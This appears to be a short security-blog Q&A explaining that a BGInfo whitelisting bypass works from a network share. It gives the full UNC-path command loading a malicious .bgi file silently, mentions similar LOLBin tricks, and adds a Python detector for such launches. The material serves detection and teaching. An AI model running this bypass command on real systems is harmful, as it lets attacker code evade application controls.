One Day Sec

Can the BGInfo whitelist bypass be executed from a network share?

Yes. Both `bginfo.exe` and the malicious `.bgi` file can be hosted on a remote server and executed via UNC path. The command `\\WIN-FVJLPTISCFE\test\bginfo.exe \\WIN-FVJLPTISCFE\test\test1.bgi /timer:0 /nolicprompt /silent` will bypass local whitelisting rules if the network share is trusted. This is similar to other LOLBin techniques like using `odbcconf` or `tracker` to load DLLs from remote sources, as seen in Study Notes Weekly No.3.
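For the defender's side of this, here is a small detection helper, added as an example and not part of the original Q&A, that scans process-creation records for BGInfo launches whose image or `.bgi` configuration comes from a UNC path and that use the non-interactive flags quoted above. The records are constructed Sysmon-style events (Image, CommandLine) for illustration; the hostname is reused from the command on this page, and the field names are assumptions.

```python
"""Flag BGInfo launches that load bginfo.exe or a .bgi file from a UNC path.

Added example for this page, not code from the original post. The events below
are constructed, Sysmon-style process-creation records, not real telemetry.
"""
import re

# Constructed sample events: one local benign launch, one UNC-path launch matching
# the command quoted on the page, and one unrelated process using a UNC path.
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\bginfo.exe",
     "CommandLine": r"C:\Tools\bginfo.exe C:\Tools\corp.bgi /timer:0"},
    {"Image": r"\\WIN-FVJLPTISCFE\test\bginfo.exe",
     "CommandLine": r"\\WIN-FVJLPTISCFE\test\bginfo.exe "
                    r"\\WIN-FVJLPTISCFE\test\test1.bgi /timer:0 /nolicprompt /silent"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe \\fileserver\share\notes.txt"},
]

# A UNC path starts with two backslashes, then host, then share.
UNC_IMAGE_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]*", re.IGNORECASE)
# A .bgi config argument that itself sits on a UNC path.
UNC_BGI_RE = re.compile(r"\\\\[^\s]+\.bgi\b", re.IGNORECASE)
NONINTERACTIVE_FLAGS = {"/timer:0", "/nolicprompt", "/silent"}


def classify(event):
    """Return the list of reasons an event is suspicious (empty if benign)."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    reasons = []
    if not image.lower().endswith("bginfo.exe"):
        return reasons  # only BGInfo launches are in scope here
    if UNC_IMAGE_RE.match(image):
        reasons.append("bginfo.exe image loaded from a UNC path")
    if UNC_BGI_RE.search(cmd):
        reasons.append(".bgi configuration loaded from a UNC path")
    flags = {tok.lower() for tok in cmd.split() if tok.startswith("/")}
    if NONINTERACTIVE_FLAGS <= flags:
        reasons.append("non-interactive flags /timer:0 /nolicprompt /silent")
    return reasons


def find_suspicious(events):
    """Return (CommandLine, reasons) pairs for every event that is flagged."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```

A local, purely on-disk BGInfo launch produces no reasons, so the rule keys on the network-share origin rather than on BGInfo itself.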
Tags: network share execution, UNC path, remote exploitation, LOLBin, application whitelisting bypass
